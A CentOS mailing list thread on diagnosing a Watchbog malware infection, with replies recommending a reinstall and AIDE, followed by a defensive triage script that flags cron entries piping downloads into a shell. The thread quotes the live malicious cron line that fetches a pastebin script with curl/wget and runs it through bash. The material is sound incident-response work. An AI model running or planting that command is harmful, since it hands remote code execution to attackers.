On 17 December 2018 9:58:03 p.m. "Pete Biggs" <pete at biggs.org.uk> wrote:
>> Is there a way to find out how the CentOS 7.5 Linux box got infected with
>> malware?
>> Currently I am referring to
>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
>> to carry out the below steps, and it is done manually.
>>
>> 1) rm -fr /tmp/*timesyncc.service*
>> 2) crontab -e -u apigee
>>    delete the cron entry
>>    */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>> 3) ps aux | grep watchbog
>>    kill -9 $(pidof watchbog)
>>
>> Any suggestions or recommendations to find out how the CentOS 7.5 Linux box got
>> infected with Watchbog malware?
>
> Well, if the infected crontab is owned by user 'apigee' then it would
> suggest that whatever runs as that user is the source of the infection.
> The malware appears to try to elevate its privs, and if it's successful
> it modifies various system files. What you are seeing in the 'apigee'
> crontab is just the tip of the iceberg.
>
> It is unlikely that what is in that blog will successfully get rid of
> all the malware - it will probably stop it running, but your system
> will still have the malware on it and it may have left other backdoors
> into your system.
>
> The *ONLY* way of being sure your system is clean is to wipe and
> reinstall. (And make sure that if you restore from backup, that the
> backup is clean.)
>
>> Is there any open source software which can
>> be installed on a CentOS 7.5 Linux box to detect and prevent malware?
>>
> Yes, lots, although most centre around detecting the intrusion rather
> than preventing it - the classic way of detecting intrusions in the
> past has been Tripwire, but it's a long time since I used it and there
> are no doubt better things around. Search for "linux intrusion
> detection tools".
>
> For prevention, by far the best way is to keep your system and
> application software up to date. The intrusions work by elevating
> privilege to root, and that elevation requires either a knowledge of
> passwords/keys or the ability to leverage vulnerabilities. The first is
> mitigated by strong passwords and proper security housekeeping; the
> second by regularly updating your system especially with security
> updates.
>
> P.
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> https://lists.centos.org/mailman/listinfo/centos

AIDE is the closest equivalent to Tripwire on CentOS.

regards
peter
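A triage script for the indicators discussed in this thread, added here as a worked example; it is not code from the thread, from the linked blog post, or from the AIDE project. It checks the three things the original poster and Pete name on a CentOS 7 box (a crontab entry that fetches a script with curl/wget and pipes it into a shell, dropped /tmp/*timesyncc.service* files, a running watchbog process), reports which user's crontab carries the entry (Pete's point that the owning user identifies the compromised service), and wraps the AIDE baseline/check commands peter's reply points to. It deliberately goes beyond the one pastebin URL quoted in the thread: the pattern matches any curl/wget-to-shell cron entry. The regex, the function names, the `--live` flag and the sample crontab in the usage note are this example's own assumptions; the AIDE paths are the CentOS 7 package defaults.

```shell
#!/bin/sh
# Added example for this thread, not code from the thread or the blog post it
# links. Looks for the indicators the posters describe and only reports them:
# as Pete says, a hit confirms the foothold and the remedy is a rebuild, not
# deleting the entry. Regex, function names and --live are assumptions.

# "(curl ...||wget ...)|bash"-style entries: a downloader, a URL, then a pipe
# into sh or bash. Works on crontab text, so it can be run over live
# `crontab -l -u USER` output or over a copy saved for offline review.
PIPE_TO_SHELL_RE='(curl|wget)[^|]*https?://[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$|>)'

# Print the lines of the crontab text $1 that match; exit 1 if none.
cron_pipe_to_shell_lines() {
    printf '%s\n' "$1" | grep -E "$PIPE_TO_SHELL_RE"
}

# Number of matching lines in the crontab text $1 (prints 0 when clean).
cron_pipe_to_shell_count() {
    printf '%s\n' "$1" | grep -c -E "$PIPE_TO_SHELL_RE"
}

# Scan every file in a crontab directory. On CentOS /var/spool/cron holds one
# file per user (named after the user) and /etc/cron.d holds system entries.
# Prints "file:line" for each hit; exit 1 if the directory is missing.
scan_cron_dir() {
    dir=$1
    [ -d "$dir" ] || return 1
    grep -H -E "$PIPE_TO_SHELL_RE" "$dir"/* 2>/dev/null
}

# Users whose spool crontab carries such an entry: the basename of each file
# with a hit. Whatever runs as that user is the likely entry point.
compromised_users() {
    scan_cron_dir "$1" | cut -d: -f1 | sed 's#.*/##' | sort -u
}

# Processes mentioning watchbog. The "[w]atchbog" form keeps grep from
# matching its own command line, which `ps aux | grep watchbog` does.
watchbog_processes() {
    ps -eo pid,user,lstart,args | grep -E '[w]atchbog'
}

# Files the linked post says the dropper leaves in /tmp.
dropped_tmp_files() {
    ls -la /tmp/*timesyncc.service* 2>/dev/null
}

# AIDE, the CentOS equivalent of Tripwire: take the baseline on the rebuilt,
# known-clean host (a baseline taken on the infected box just enshrines the
# malware) and compare against it later. Paths are the CentOS 7 aide defaults.
aide_baseline() {
    aide --init && mv -f /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz
}
aide_check() {
    aide --check
}

# Live report for this host; run as root with --live. Nothing is deleted or
# killed here, since the thread's advice is to rebuild once this is confirmed.
live_scan() {
    echo "== crontab entries piping a download into a shell =="
    scan_cron_dir /var/spool/cron || echo "(none in /var/spool/cron)"
    scan_cron_dir /etc/cron.d || echo "(none in /etc/cron.d)"
    grep -H -E "$PIPE_TO_SHELL_RE" /etc/crontab 2>/dev/null || echo "(none in /etc/crontab)"
    echo "== users whose crontab carries one =="
    compromised_users /var/spool/cron || echo "(none)"
    echo "== files dropped in /tmp =="
    dropped_tmp_files || echo "(none)"
    echo "== watchbog processes =="
    watchbog_processes || echo "(none)"
}

if [ "${1:-}" = "--live" ]; then
    live_scan
fi
```

Run it as root with `sh watchbog-triage.sh --live` on the suspect host, or source it and feed `cron_pipe_to_shell_lines` a saved crontab copy when reviewing an image offline. Against a constructed spool file for `apigee` holding the entry quoted in the thread plus ordinary backup and health-check lines, `scan_cron_dir` reports exactly that one line and `compromised_users` prints `apigee`; a plain curl that is not piped into a shell is not flagged.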